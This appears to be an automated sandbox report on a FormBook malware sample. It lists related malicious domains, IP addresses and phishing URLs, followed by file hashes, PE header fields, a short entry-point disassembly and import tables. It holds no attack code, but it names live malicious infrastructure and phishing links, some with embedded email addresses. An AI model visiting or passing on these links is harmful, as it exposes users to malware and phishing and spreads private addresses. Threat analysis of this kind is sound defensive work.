  | rRFQ.bat.exe | Get hash | malicious | FormBook | Browse |
  • www.mbwd.store/bmmx/
  | REQUEST FOR QUOTATION.exe | Get hash | malicious | FormBook, GuLoader | Browse |
  • www.mbwd.store/pn1r/
  | TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe | Get hash | malicious | FormBook | Browse |
  • www.mtmoriacolives.store/bkj6/
  | 6ddrUd6iQo.exe | Get hash | malicious | FormBook | Browse |
  • www.eastcoastev.site/51n1/
  | INV90097.exe | Get hash | malicious | FormBook | Browse |
  • www.anzskincare.xyz/n1ua/
  | Electronic Order.exe | Get hash | malicious | FormBook | Browse |
  • www.dtalusering.com/la5g/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
dns.ladipage.com | SecuriteInfo.com.Win32.Malware-gen.24953.22588.exe | Get hash | malicious | FormBook | Browse |
  • 13.228.81.39
  | 3T-ENQ-O-2024-10856.exe | Get hash | malicious | FormBook | Browse |
  • 18.139.62.226
  | New Purchase Order.exe | Get hash | malicious | FormBook | Browse |
  • 54.179.173.60
  | Scan 00093847.exe | Get hash | malicious | FormBook | Browse |
  • 18.139.62.226
  | z11SOAAUG2408.exe | Get hash | malicious | FormBook | Browse |
  • 13.228.81.39
  | REQUEST FOR QUOTATION.exe | Get hash | malicious | FormBook, GuLoader | Browse |
  • 13.228.81.39
  | DN.exe | Get hash | malicious | FormBook | Browse |
  • 18.139.62.226
  | https://www.newbalancestore.asia/nb530.nh?utm_source=sale | Get hash | malicious | Unknown | Browse |
  • 13.228.81.39
  | DHL_497104778908.exe | Get hash | malicious | FormBook | Browse |
  • 18.139.62.226
  | Shipping Documents 7896424100.exe | Get hash | malicious | FormBook | Browse |
  • 13.228.81.39
www.independent200.org | 3T-ENQ-O-2024-10856.exe | Get hash | malicious | FormBook | Browse |
  • 103.42.108.46
  | LKkVS1VFJD.exe | Get hash | malicious | FormBook | Browse |
  • 103.42.108.46
www.mediaplug.biz | 3T-ENQ-O-2024-10856.exe | Get hash | malicious | FormBook | Browse |
  • 66.81.203.10
  | Jsn496Em5T.exe | Get hash | malicious | FormBook | Browse |
  • 66.81.203.135
  | 6i4QCFbsNi.exe | Get hash | malicious | FormBook | Browse |
  • 66.81.203.200
  | Curriculum Vitae.exe | Get hash | malicious | FormBook | Browse |
  • 66.81.203.200
  | z11SOAAUG2408.exe | Get hash | malicious | FormBook | Browse |
  • 66.81.203.200
  | DN.exe | Get hash | malicious | FormBook | Browse |
  • 66.81.203.135
  | Filename.exe | Get hash | malicious | DarkTortilla, FormBook | Browse |
  • 66.81.203.200
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
AMAZON-02US | Wrall.exe | Get hash | malicious | Unknown | Browse |
  • 3.5.216.50
  | 809768765454654.exe | Get hash | malicious | FormBook | Browse |
  • 35.154.47.49
  | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Faggarwaltradersindia.in%2Fskoda%2FX3HOVMfsCLBJWP5GhJNdLWwq/bmlyYXYuZGVzYWlAbHJxYS5jb20= | Get hash | malicious | HTMLPhisher | Browse |
  • 52.29.121.189
  | https://l.co.uk | Get hash | malicious | Unknown | Browse |
  • 35.165.241.124
  | https://andersonattack.com#suthra@oneazcu.com?client_id=email=suthra%40oneazcu.com&fname=&lname=&rid=IRXTDhDszfpTc61bxRYlWAueOHqUt8Z | Get hash | malicious | HTMLPhisher | Browse |
  • 63.32.164.83
  | http://telstra-109219.weeblysite.com/ | Get hash | malicious | HTMLPhisher | Browse |
  • 54.201.194.161
  | http://metsmklogin.gitbook.io/ | Get hash | malicious | Unknown | Browse |
  • 34.252.37.84
  | http://gegimini-loggiyn.gitbook.io/ | Get hash | malicious | Unknown | Browse |
  • 34.252.37.84
  | http://uphaild-login.gitbook.io/ | Get hash | malicious | Unknown | Browse |
  • 34.252.37.84
  | http://axxn-5yor.vercel.app/blog1/ | Get hash | malicious | Unknown | Browse |
  • 76.76.21.22
SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU | 3T-ENQ-O-2024-10856.exe | Get hash | malicious | FormBook | Browse |
  • 103.42.108.46
  | New Purchase Order.exe | Get hash | malicious | FormBook | Browse |
  • 103.42.108.46
  | Scan 00093847.exe | Get hash | malicious | FormBook | Browse |
  • 103.42.108.46
  | firmware.sh4.elf | Get hash | malicious | Unknown | Browse |
  • 103.27.32.30
  | LKkVS1VFJD.exe | Get hash | malicious | FormBook | Browse |
  • 103.42.108.46
  | http://www.greenprintlandscapes.com.au | Get hash | malicious | Unknown | Browse |
  • 110.232.143.97
  | http://fslink.megnagroup.com.au/email/track/click?hash=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7Im11c3RoIjoiaHR0cHM6Ly9tZWduYWdyb3VwLmNvbS5hdS8iLCJsaW9uIjoiNzVkNGMiLCJnb3JpbGxhIjoiYmE1MDZjM2NlIiwidGlnZXIiOiJmc2xpbmsubWVnbmFncm91cC5jb20uYXUifSwiaWF0IjoxNzI0OTg3NTgyfQ.q2Cl712fuiOGcrrlV8jnMlRPUIhIoDJ0d2m4R_WTYLA~eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7ImhvcnNlIjoia2V2aW4uc21pdGhAc2FuaXRhcml1bS5jb20uYXUiLCJjYW1lbCI6ImJhNmM1MDlmZSJ9LCJpYXQiOjE3MjQ5ODc1ODJ9.KTlm-RKp1KYEIDipXUGHrWZz7AycFi0jesA9WqoLoig | Get hash | malicious | Unknown | Browse |
  • 110.232.143.78
  | rRFQ.bat.exe | Get hash | malicious | FormBook | Browse |
  • 103.42.108.46
  | REQUEST FOR QUOTATION.exe | Get hash | malicious | FormBook, GuLoader | Browse |
  • 103.42.108.46
  | RFQ-HL51L05.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse |
  • 110.232.143.114
CONFLUENCE-NETWORK-INCVG | SecuriteInfo.com.Win32.Malware-gen.24953.22588.exe | Get hash | malicious | FormBook | Browse |
  • 208.91.197.27
  | New Purchase Order.exe | Get hash | malicious | FormBook | Browse |
  • 208.91.197.27
  | r9856_7.exe | Get hash | malicious | FormBook | Browse |
  • 208.91.197.13
  | 3T-ENQ-O-2024-10856.exe | Get hash | malicious | FormBook | Browse |
  • 66.81.203.10
  | BCNFNjvJNq.exe | Get hash | malicious | ADWIND, Lokibot, Ramnit, Sality | Browse |
  • 204.11.56.48
  | Jsn496Em5T.exe | Get hash | malicious | FormBook | Browse |
  • 66.81.203.135
  | EGCS-875-S5-SMO M2A.exe | Get hash | malicious | FormBook | Browse |
  • 208.91.197.27
  | OjKmJJm2YT.exe | Get hash | malicious | Simda Stealer | Browse |
  • 199.191.50.83
  | 5AFlyarMds.exe | Get hash | malicious | Simda Stealer | Browse |
  • 199.191.50.83
  | uB31aJH4M0.exe | Get hash | malicious | Simda Stealer | Browse |
  • 199.191.50.83
                          No context
                          No context
                          Process:C:\Windows\SysWOW64\netbtugc.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                          Category:dropped
                          Size (bytes):196608
                          Entropy (8bit):1.121297215059106
                          Encrypted:false
                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                          MD5:D87270D0039ED3A5A72E7082EA71E305
                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):287744
                          Entropy (8bit):7.995084106275985
                          Encrypted:true
                          SSDEEP:6144:P2giArNGx3FAFL6uCg19gk59YG86uQg+IyDNTNOx8vtDUSBGhnmMloB:P8jsWuCNE9A6uv+IyfG8vtFBZMloB
                          MD5:8CDA2E243ED77483F56F826B52C2825F
                          SHA1:0EA2FDFA8C418333781E893AF626C7FDFFA965EB
                          SHA-256:D7D9AB408CCC9FC969D45D7981EEA335064125BB048B1DD5D8DF858D190CCF14
                          SHA-512:C35E70A52C40ACCD12B8C3E3F37C4A2876D004520D4F9CFB1FF1F9F2EA689559FA36B4CDDC8D415198F7FF2CEC5BCBB63AC204339E8CE72E6360B4DF6E81F4B6
                          Malicious:false
                          Reputation:low
Preview:~....KTWRj..Q.....PP....2Q...BOG1KTWR2M8XFV873TPSRS591YWM3B.G1KZH.<M.Q.w.6..q.::F.A+8*A#"gR*:9=FmZ=f$MY.=>s..f.\63(.OBM.KTWR2M8!G_..S3.n24..Q>.W..}Q,.M....8!."...l35.gPR1j-T.OG1KTWR2.}XF.963..S591YWM3.OE0@U\R2.<XFV873TPS2G591IWM32KG1K.WR"M8XDV813TPSRS5?1YWM3BOGAOTWP2M8XFV:7s.PSBS5)1YWM#BOW1KTWR2]8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591w
                          Process:C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):287744
                          Entropy (8bit):7.995084106275985
                          Encrypted:true
                          SSDEEP:6144:P2giArNGx3FAFL6uCg19gk59YG86uQg+IyDNTNOx8vtDUSBGhnmMloB:P8jsWuCNE9A6uv+IyfG8vtFBZMloB
                          MD5:8CDA2E243ED77483F56F826B52C2825F
                          SHA1:0EA2FDFA8C418333781E893AF626C7FDFFA965EB
                          SHA-256:D7D9AB408CCC9FC969D45D7981EEA335064125BB048B1DD5D8DF858D190CCF14
                          SHA-512:C35E70A52C40ACCD12B8C3E3F37C4A2876D004520D4F9CFB1FF1F9F2EA689559FA36B4CDDC8D415198F7FF2CEC5BCBB63AC204339E8CE72E6360B4DF6E81F4B6
                          Malicious:false
                          Reputation:low
Preview:~....KTWRj..Q.....PP....2Q...BOG1KTWR2M8XFV873TPSRS591YWM3B.G1KZH.<M.Q.w.6..q.::F.A+8*A#"gR*:9=FmZ=f$MY.=>s..f.\63(.OBM.KTWR2M8!G_..S3.n24..Q>.W..}Q,.M....8!."...l35.gPR1j-T.OG1KTWR2.}XF.963..S591YWM3.OE0@U\R2.<XFV873TPS2G591IWM32KG1K.WR"M8XDV813TPSRS5?1YWM3BOGAOTWP2M8XFV:7s.PSBS5)1YWM#BOW1KTWR2]8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591w
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.162279986205745
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:r3T-ENQ-O-2024-10856.exe
                          File size:1'225'728 bytes
                          MD5:52ef22af5530fe6362d8638583866c7f
                          SHA1:bf344e2b57cf1faea3c523212fa0aee1a99a3a6a
                          SHA256:122c7d2d307d52030eb2021410912b9cf3af46ee3f25a9fd8869f22a8a0baff9
                          SHA512:4da7dccbe49c00ce1eaf8cc80e230771f4fcd0668887bb212b0713e1c85ee86a880adaaced7009cd9214a2fc5cfebedab8c2f08e9fea4287aebfc31711713c19
                          SSDEEP:24576:A4lavt0LkLL9IMixoEgeaiuQZQehpmZfjuYcV8Y7Ebq9MmCS:3kwkn9IMHeaipNuuYMjSaPCS
                          TLSH:5845C01373DDC3A1C3725273BA65BB01AEBB7C2506A1F59B2FD4093DE920162921E673
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S................g..........$...............%.....H.......X.2...........q)..Z...q)......q)........\.....q)......Rich...........
                          Icon Hash:aaf3e3e3938382a0
                          Entrypoint:0x426bf7
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66E224FA [Wed Sep 11 23:17:14 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:bbac62fd99326ea68ec5a33b36925dd1
                          Instruction
                          call 00007F83ACC3E7FCh
                          jmp 00007F83ACC316E4h
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          push edi
                          push esi
                          mov esi, dword ptr [esp+10h]
                          mov ecx, dword ptr [esp+14h]
                          mov edi, dword ptr [esp+0Ch]
                          mov eax, ecx
                          mov edx, ecx
                          add eax, esi
                          cmp edi, esi
                          jbe 00007F83ACC3186Ah
                          cmp edi, eax
                          jc 00007F83ACC31BCEh
                          bt dword ptr [004C0158h], 01h
                          jnc 00007F83ACC31869h
                          rep movsb
                          jmp 00007F83ACC31B7Ch
                          cmp ecx, 00000080h
                          jc 00007F83ACC31A34h
                          mov eax, edi
                          xor eax, esi
                          test eax, 0000000Fh
                          jne 00007F83ACC31870h
                          bt dword ptr [004BA370h], 01h
                          jc 00007F83ACC31D40h
                          bt dword ptr [004C0158h], 00000000h
                          jnc 00007F83ACC31A0Dh
                          test edi, 00000003h
                          jne 00007F83ACC31A1Eh
                          test esi, 00000003h
                          jne 00007F83ACC319FDh
                          bt edi, 02h
                          jnc 00007F83ACC3186Fh
                          mov eax, dword ptr [esi]
                          sub ecx, 04h
                          lea esi, dword ptr [esi+04h]
                          mov dword ptr [edi], eax
                          lea edi, dword ptr [edi+04h]
                          bt edi, 03h
                          jnc 00007F83ACC31873h
                          movq xmm1, qword ptr [esi]
                          sub ecx, 08h
                          lea esi, dword ptr [esi+08h]
                          movq qword ptr [edi], xmm1
                          lea edi, dword ptr [edi+08h]
                          test esi, 00000007h
                          je 00007F83ACC318C5h
                          Programming Language:
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [ASM] VS2012 UPD4 build 61030
                          • [RES] VS2012 UPD4 build 61030
                          • [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb6b6c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x61f54 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x126000 | 0x6c20 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2770 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x858 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8be74 | 0x8c000 | 74af66fa540568c59b3868e78900e476 | False | 0.5690970284598215 | data | 6.681489717174931 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2c76a | 0x2c800 | 576c856afaad699ad9fe099fc6a9ce33 | False | 0.33122476299157305 | zlib compressed data | 5.781163507108141 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9f34 | 0x6200 | e6d2e204147f7cdc3055011093632f54 | False | 0.1639030612244898 | data | 2.004392861291539 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x61f54 | 0x62000 | 27e6b8a9e26174e545852ef38602d313 | False | 0.9331528021364796 | data | 7.90494053334378 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x126000 | 0xa462 | 0xa600 | c2f6ddaeef894b7510c3be928eeae5dd | False | 0.5080948795180723 | data | 5.238496692777452 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc7b8 | 0x591f1 | data | | | 1.0003314696157417
RT_GROUP_ICON | 0x1259ac | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x125a24 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x125a38 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x125a4c | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x125a60 | 0x144 | data | English | Great Britain | 0.5895061728395061
RT_MANIFEST | 0x125ba4 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
DLL | Import
WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, CloseHandle, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, CreateThread, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, GetLastError, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, DuplicateHandle, GetCurrentProcess, EnterCriticalSection, GetCurrentThread, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, FindNextFileW, SetEnvironmentVariableA
USER32.dll | CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, AdjustWindowRectEx, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, UnregisterHotKey, SystemParametersInfoW, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, GetCursorPos, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, FindWindowW, CharLowerBuffW, GetWindowTextW
GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
